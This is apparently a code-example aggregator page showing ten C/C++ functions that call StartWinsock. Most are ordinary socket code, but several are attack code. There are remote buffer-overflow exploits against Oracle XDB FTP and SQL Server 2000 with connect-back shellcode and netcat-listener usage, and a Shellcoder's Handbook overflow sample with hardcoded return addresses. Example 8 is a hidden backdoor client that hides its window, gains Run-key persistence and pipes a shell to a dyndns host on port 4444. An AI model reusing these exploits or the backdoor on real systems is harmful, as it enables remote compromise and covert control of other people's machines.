C++ (Cpp) StartWinsock Exemples

Exemple #1

Fichier : 80.c Projet : ALurker/exploit-database

int main(int argc, char *argv[]) 
{ 
if(argc != 6) 
{ 
printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit"); 
printf("\n\t\tfor Blackhat (http://www.blackhat.com)"); 
printf("\n\n\tSpawns a reverse shell to specified port"); 
printf("\n\n\tUsage:\t%s host userid password ipaddress port",argv[0]); 
printf("\n\n\tDavid Litchfield\n\t([email protected])");
printf("\n\t6th July 2003\n\n\n"); 
return 0; 
} 
strncpy(host,argv[1],250); 
if(StartWinsock()==0) 
return printf("Error starting Winsock.\n"); 
SetUpExploit(argv[4],atoi(argv[5])); 
strcat(exploit_code,short_jump); 
strcat(exploit_code,exception_handler); 
strcat(exploit_code,exploit); 
strcat(exploit_code,"\r\n"); 


GainControlOfOracle(argv[2],argv[3]); 
return 0; 
} 

Exemple #2

Fichier : Shellcoders08sampleprogram13.c Projet : 0xr0ot/shellcoderhandbook

     int main(int argc, char *argv[])
     {
            int cnt = 0;
            unsigned char buffer[1000]="";

            if(argc !=3)
                    return 0;

            StartWinsock();

            // Set the IP address and port in the exploit code
            // If your IP address has a NULL in it then the
            // string will be truncated.
            SetUpExploit(argv[1],atoi(argv[2]));

            // name of the vulnerable program
            strcpy(buffer,"nes ");
            // copy exploit code to the buffer
            strcat(buffer,exploit);

            // Pad out the buffer	
            while(cnt < 25)
            {
                    strcat(buffer,"\x90\x90\x90\x90");
                    cnt ++;
            }

            strcat(buffer,"\x90\x90\x90\x90");

            // Here's where we overwrite the saved return address
            // This is the address of lstrcatA on Windows XP SP 1
            // 0x77E74B66
            strcat(buffer,"\x66\x4B\xE7\x77");

            // Set the return address for lstrcatA
            // this is where our code will be copied to
            // in the TEB
            strcat(buffer,"\xBC\xE1\xFD\x7F");

            // Set the destination buffer for lstrcatA
            // This is in the TEB and we'll return to
            // here.
            strcat(buffer,"\xBC\xE1\xFD\x7F");


            // This is our source buffer. This is the address
            // where we find our original buffer on the stack
            strcat(buffer,"\x10\xFB\x12");

            // Now execute the vulnerable program!
            WinExec(buffer,SW_MAXIMIZE);

            return 0;
     }

Exemple #3

Fichier : main.c Projet : krautchan/Timber

int EntryPoint(void) {
    SOCKET s;

    StartLogger(TEXT(LOGFILE));

    if(StartWinsock() != 0)
        return -1;

    s = CreateListenSocket(SERVER_PORT);
    if((s == SOCKET_ERROR) || (s == INVALID_SOCKET))
        return -1;
    ServerLoop(s);

    WSACleanup();

    return 1;
}

Exemple #4

Fichier : client.c Projet : g5tyl3/Timber

int main(int argc, char **argv) {
	SOCKET s;
	char *remote;

	if(argc > 1)
		remote = argv[1];
	else
		remote = REMOTE_ADDR;
	
	printf("Starting Winsock... ");
	if(StartWinsock() != 0) {
		printf("Failed.\n");
		return EXIT_FAILURE;
	}
	printf("OK.\n");

	printf("Connecting to %s:%d... ", remote, SERVER_PORT);

	if((s = CreateConnectSocket(remote, SERVER_PORT)) == SOCKET_ERROR) {
		printf("Failed.\n");
		return EXIT_FAILURE;
	}
	printf("OK.\n\n");

	if(ClientHandshake(s))
		CommandLoop(s);

	WSACleanup();

	if(conn.dh_remote_key)
		free(conn.dh_remote_key);
	if(conn.dh_shared_key)
		free(conn.dh_shared_key);
	if(conn.nonce)
		free(conn.nonce);

#ifdef _DEBUG
	showmemstats(stdout);
#endif

	return EXIT_SUCCESS;
}

Exemple #5

Fichier : friUdp.cpp Projet : ipa-nhg/kukadu

friUdp::friUdp(int port, char * remoteHost) : serverPort(port)
{
	   /* check struct sizes */
    if (!FRI_CHECK_SIZES_OK)
    {
        printf("data structure size error!\n");
        exit(1);
    }

	m_timestamp=0;
	// Make shure, that e.g. simulink uses no stupid standard definition - e.g. 0
	if ( serverPort < 10 )
	{
		serverPort=FRI_DEFAULT_SERVER_PORT;	
	}

#ifdef WIN32
	StartWinsock();
#endif
  Init(remoteHost);
}

Exemple #6

Fichier : main.cpp Projet : FrOzeN89/AndroidAppServer

// Return port number listening on, return 0 if failed to listen
int StartListen(int Port)
{
	// If winsock doesn't start return false
	if (!StartWinsock())
		return 0;

	// Limit port to 1-32767 range
	if ((Port < 1) || (Port > 32767))
		Port = 80;

	SocketListen = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	if (SocketListen == INVALID_SOCKET)
	{
		SocketListen = NULL;
		return 0;
	}

	sockaddr_in SockAddr;

	SockAddr.sin_family = AF_INET;
	SockAddr.sin_port = htons(Port);
	SockAddr.sin_addr.S_un.S_addr = INADDR_ANY;

	int Result = bind(SocketListen, (sockaddr*)(&SockAddr), sizeof(SockAddr));

	if (Result != 0)
	{
		CloseWinsock();
		SocketListen = NULL;
		return 0;
	}

	listen(SocketListen, 1);
	WSAAsyncSelect(SocketListen, fMain, WM_SOCKET, FD_CONNECT | FD_ACCEPT);

	return Port;
};

Exemple #7

Fichier : Server1.cpp Projet : Harwkx/laboxid-base-devel

int main()
{
	//Testausgabe
	printf("Socket Client\n");

	//Variablen initialisieren
	long returnvalue;
	char buf[256];
	SOCKET acceptSocket;
	SOCKET connectedSocket;
	SOCKADDR_IN addr;

	//Socket Verfügbarkeit prüfen
	returnvalue = StartWinsock();
	if(returnvalue != 0)
	{
		printf("Fehler: StartWinsock Fehlercode: %d!\n",returnvalue);
		return 1;
	}
	else
	{
		printf("Winsock gestartet!\n");
	}

	//Socket initialisieren
	acceptSocket = socket(AF_INET,SOCK_STREAM,0);
	if(acceptSocket == INVALID_SOCKET)
	{
		printf("Fehler: Der Socket konnte nicht erstellt werden, fehler code: %d\n",WSAGetLastError());
		return 1;
	}
	else
	{
		printf("Socket erstellt!\n");
	}

	//Verbindung initialisieren
	memset(&addr,0,sizeof(SOCKADDR_IN));
	addr.sin_family = AF_INET;
	addr.sin_port = htons(12345);
	addr.sin_addr.s_addr = ADDR_ANY;
	returnvalue = bind(acceptSocket,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));

	if(returnvalue == SOCKET_ERROR)
	{
		printf("Fehler: bind, fehler code: %d\n",WSAGetLastError());
		return 1;
	}
	else
	{
		printf("Socket an port 12345 gebunden\n");
	}

	//Verbindung bereitstellen
	returnvalue = listen(acceptSocket,10);
	if(returnvalue == SOCKET_ERROR)
	{
		printf("Fehler listen, fehler code: %d",WSAGetLastError());
		return 1;
	}
	else
	{
		printf("AcceptSocket ist im Listen-Modus ...\n");
	}

	//Auf Verbindung warten und herstellen
	connectedSocket = accept(acceptSocket,NULL,NULL);
	if(connectedSocket == INVALID_SOCKET)
	{
		printf("Fehler: accept, fehler code: %d\n",WSAGetLastError());
		return 1;
	}
	else
	{
		printf("Neue Verbindung wurde akzeptiert!\n");
	}

	//FUNKTION: Endlos-Chat
	while(1)
	{
		//Warten auf Input
		printf("[-] Warte auf Input ...\n\n");
		memset(buf,0,sizeof(buf));
		returnvalue = recv(connectedSocket,buf,255,0);
		if(returnvalue == 0 || returnvalue == SOCKET_ERROR)
		{
			printf("Fehler: recv, fehler code: %d\n",WSAGetLastError());
		}
		else
		{
			buf[returnvalue]=0;
			printf("Antwort: %s\n\n",buf);
		}

		//Senden von Output
		printf("Senden: ");
		fgets(buf,255,stdin);
		send(connectedSocket,buf,255,0);
		printf("\nNachricht gesendet!\n\n");
	}



	//Programmende
	printf("\n");
	return 0;
}

Exemple #8

Fichier : Client.cpp Projet : Harwkx/laboxid-base-devel

int main(int argc, char** argv)
{
	char dyndns[] ="www.youradress.com";

	//Get the CWD and append the new Filename for the Copy-Method of the exe itself.
	//Note: Ugly one... leave it in his dark place alone and hope it will die someday..
	char * buffer;
	buffer = _getcwd(NULL, 0);
	int counter =0;

	for(int i = 0;;i++)
	{
		if(counter == 2)
		{
			if(buffer[i] == '\\' || buffer[i] == '>')
			{
				buffer[i] = 0;
				break;
			}
		}

		if(buffer[i]=='\\')
		{
			counter++;
		}
	}
	strcat(buffer,"\\yourfilename.exe");

	CopyFileA(argv[0],buffer,false);
		

#if !DEBUG
	//Hideing the console window

	HWND hWnd = GetConsoleWindow();
	ShowWindow( hWnd, SW_HIDE );

	//Setting the console name for fun and profit
	//char name[]="SPARTA";
	//SetConsoleTitleA(name);

	char subkey[]= "Software\\Microsoft\\Windows\\CurrentVersion\\Run";

	//char cwd[1024];
	//char asf[] = "lolololol";
	//_getcwd(cwd,1024);
	//strcat(cwd,"\\");
	//strcpy(cwd,**argv);
	//strcat(cwd,argv[0]);

	DWORD shit=0;
	RegSetValueA(HKEY_CURRENT_USER,subkey,REG_SZ, buffer, shit);
#endif

	//Testausgabe
#if DEBUG
	printf("Socket Client\n");
#endif

	//Variablen initialisieren
	long returnvalue;
	SOCKADDR_IN addr;
	SECURITY_ATTRIBUTES saAttr;

#if DEBUG
	printf("\n->Start of parent execution.\n");
#endif

	// Set the bInheritHandle flag so pipe handles are inherited. 

	saAttr.nLength = sizeof(SECURITY_ATTRIBUTES); 
	saAttr.bInheritHandle = TRUE; 
	saAttr.lpSecurityDescriptor = NULL; 

	// Create a pipe for the child process's STDOUT. 

	if ( ! CreatePipe(&g_hChildStd_OUT_Rd, &g_hChildStd_OUT_Wr, &saAttr, 0) ) 
		exit(2); 

	// Ensure the read handle to the pipe for STDOUT is not inherited.

	if ( ! SetHandleInformation(g_hChildStd_OUT_Rd, HANDLE_FLAG_INHERIT, 0) )
		exit(3); 

	// Create a pipe for the child process's STDIN. 

	if (! CreatePipe(&g_hChildStd_IN_Rd, &g_hChildStd_IN_Wr, &saAttr, 0)) 
		exit(4); 

	// Ensure the write handle to the pipe for STDIN is not inherited. 

	if ( ! SetHandleInformation(g_hChildStd_IN_Wr, HANDLE_FLAG_INHERIT, 0) )
		exit(5); 

	// Create the child process. 

	CreateChildProcess();

	//Weitere SOCKET Abhandlungen...

	//Socket Verfügbarkeit prüfen
	do
	{
		returnvalue = StartWinsock();
		if(returnvalue != 0)
		{
#if DEBUG
			printf("[-] Fehler: StartWinsock Fehlercode: %d!\n",returnvalue);
#endif
			Sleep(60000);
		}
#if DEBUG
		else
		{
			printf("[+] Winsock gestartet!\n");
		}
#endif
	}
	while(returnvalue != 0);

	//Socket initialisieren
	do
	{
		sock = socket(AF_INET,SOCK_STREAM,0);
		if(sock == INVALID_SOCKET)
		{
#if DEBUG
			printf("[-] Fehler: Der Socket konnte nicht erstellt werden, fehler code: %d\n",WSAGetLastError());
#endif
			Sleep(60000);
		}
#if DEBUG
		else
		{
			printf("[+] Socket erstellt!\n");
		}
#endif
	}
	while(sock == INVALID_SOCKET);

	//Port und IP übergabe
	memset(&addr,0,sizeof(SOCKADDR_IN));
	addr.sin_family = AF_INET;
	addr.sin_port = htons(4444);
	//addr.sin_addr.s_addr = inet_addr("127.0.0.1");

	do
	{
		returnvalue = getAddrFromString(dyndns,&addr);
		if(returnvalue == SOCKET_ERROR)
		{
#if DEBUG
		printf("[-] Fehler: IP für %s konnte nicht aufgeloest werden.\n");
#endif
		Sleep(60000);
		}
#if DEBUG
		else
		{
		printf("[+] IP aufgelöst!\n");
		}
#endif
	}
	while(returnvalue == SOCKET_ERROR);

	//Verbindungsaufbau
	do
	{
		returnvalue = connect(sock, (SOCKADDR*)&addr, sizeof(SOCKADDR));
		if(returnvalue == SOCKET_ERROR)
		{
#if DEBUG
			printf("[-] Fehler: connect gescheitert, fehler code: %d\n",WSAGetLastError());
#endif
			Sleep(60000);
		}
#if DEBUG
		else
		{
			printf("[+] Verbindung hergestellt mit %s\n",argv[1]);
		}
#endif
	}
	while(returnvalue == SOCKET_ERROR);

	for(;;)
	{
#if DEBUG
		//Warten auf Input
		printf("[-] Warte auf Input ...\n\n");
#endif

		WriteToPipe(); 

		ReadFromPipe();

		if(exitOnForce)
		{
#if DEBUG
			printf("\n->SYSTEM GOING DOWN!\n");
#endif
			break;
		}
	}
#if DEBUG
	printf("\n->End of parent execution.\n");
#endif

	// The remaining open handles are cleaned up when this process terminates. 
	// To avoid resource leaks in a larger application, close handles explicitly. 

	return 0;
}

Exemple #9

Fichier : sql2.cpp Projet : B-Rich/osf_db

int main(int argc, char *argv[])
{
	unsigned int ErrorLevel=0,len=0,c =0;
	int count = 0;
	char sc[300]="";
	char ipaddress[40]="";
	unsigned short port = 0;
	unsigned int ip = 0;
	char *ipt="";
	char buffer[400]="";
	unsigned short prt=0;
	char *prtt="";


	if(argc != 2 && argc != 5)
	{
		printf("===============================================================\r\n");
		printf("SQL Server UDP Buffer Overflow Remote Exploit\r\n\n");
		printf("Modified from \"Advanced Windows Shellcode\"\r\n");
		printf("Code by David Litchfield, [email protected]\r\n");
		printf("Modified by lion, fix a bug.\r\n");
		printf("Welcome to HUC Website http://www.cnhonker.com\r\n\n");
		printf("Usage:\r\n");
		printf("    %s Target [<NCHost> <NCPort> <SQLSP>]\r\n\n", argv[0]);
		printf("Exemple:\r\n");
		printf("Target is MSSQL SP 0:\r\n");
		printf("    C:\\>nc -l -p 53\r\n");
		printf("    C:\\>%s db.target.com 202.202.202.202 53 0\r\n",argv[0]);
		printf("Target is MSSQL SP 1 or 2:\r\n");
		printf("    c:\\>%s db.target.com 202.202.202.202\r\n\n", argv[0]);
		return 0;
	}

	strncpy(host, argv[1], 100);

	if(argc == 5)
	{
		strncpy(ipaddress, argv[2], 36);

		port = atoi(argv[3]);

		// SQL Server 2000 Service pack level
		// The import entry for GetProcAddress in sqlsort.dll
		// is at  0x42ae1010 but on SP 1 and 2 is at  0x42ae101C
		// Need to set the last byte accordingly

		if(argv[4][0] == 0x30)
		{
			printf("MSSQL SP 0. GetProcAddress @0x42ae1010\r\n");
			exploit_code[9]=0x10;
		}
		else
		{
			printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101C\r\n");
		}

	}

	ErrorLevel = StartWinsock();
	if(ErrorLevel==0)
	{
		printf("Starting Winsock Error.\r\n");
		return 0;
	}

	if(argc == 2)
	{
		strcpy(request,ping);

		GainControlOfSQL();
		return 0;
	}


	strcpy(buffer,exploit_code);

	// set this IP address to connect back to
	// this should be your address
	ip = inet_addr(ipaddress);
	ipt = (char*)&ip;
	buffer[142]=ipt[0];
	buffer[143]=ipt[1];
	buffer[144]=ipt[2];
	buffer[145]=ipt[3];

	// set the TCP port to connect on
	// netcat should be listening on this port
	// e.g. nc -l -p 80

	prt = htons(port);
	prt = prt ^ 0xFFFF;
	prtt = (char *) &prt;
	buffer[160]=prtt[0];
	buffer[161]=prtt[1];

	strcat(request,"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX");

	// Overwrite the saved return address on the stack
	// This address contains a jmp esp instruction
	// and is in sqlsort.dll.

	strcat(request,"\xDC\xC9\xB0\x42"); // 0x42B0C9DC

	// Need to do a near jump
	strcat(request,"\xEB\x0E\x41\x42\x43\x44\x45\x46");

	// Need to set an address which is writable or
	// sql server will crash before we can exploit
	// the overrun. Rather than choosing an address
	// on the stack which could be anywhere we'll
	// use an address in the .data segment of sqlsort.dll
	// as we're already using sqlsort for the saved
	// return address

	// SQL 2000 no service packs needs the address here
	strcat(request,"\x01\x70\xAE\x42");

	// SQL 2000 Service Pack 2 needs the address here
	strcat(request,"\x01\x70\xAE\x42");

	// just a few nops
	strcat(request,"\x90\x90\x90\x90\x90\x90\x90\x90");


	// tack on exploit code to the end of our request and fire it off
	strcat(request,buffer);

	GainControlOfSQL();

	return 0;
}

Exemple #10

Fichier : link_win32.c Projet : Distrotech/DirectFB

DirectResult
voodoo_link_init_connect( VoodooLink *link,
                          const char *hostname,
                          int         port,
                          bool        raw )
{
     int                 ret; 
     struct sockaddr_in  addr;
     Link               *l;

     D_INFO( "Voodoo/Link: Connecting to '%s:%d'...\n", hostname, port );

     StartWinsock();

     l = D_CALLOC( 1, sizeof(Link) );
     if (!l)
          return D_OOM();

     l->socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
     if (l->socket == INVALID_SOCKET) {
          ret = errno2result( errno );
          D_PERROR( "Voodoo/Link: Socket creation failed!\n" );
          D_FREE( l );
          return ret;
     }

     addr.sin_family      = AF_INET;
     addr.sin_addr.s_addr = inet_addr( hostname );
     addr.sin_port        = htons( port );

     ret = connect( l->socket, (const struct sockaddr*) &addr, sizeof(addr) );
     if (ret < 0) {
          ret = errno2result( errno );
          D_PERROR( "Voodoo/Link: Socket connect failed!\n" );
          // FIXME: how to close the socket?
          D_FREE( l );
          return ret;
     }

     direct_mutex_init( &l->lock );

     l->event  = WSACreateEvent();

     if (!raw) {
          link->code = 0x80008676;

          if (send( l->socket, (const char*) &link->code, sizeof(link->code), 0 ) != 4) {
               D_ERROR( "Voodoo/Link: Coult not write initial four bytes!\n" );
               // FIXME: how to close the socket?
               D_FREE( l );
               return DR_IO;
          }
     }

     link->priv        = l;
     link->Close       = Close;
     link->Read        = Read;
     link->Write       = Write;
     link->SendReceive = SendReceive;
     link->WakeUp      = WakeUp;
     link->WaitForData = WaitForData;

     return DR_OK;
}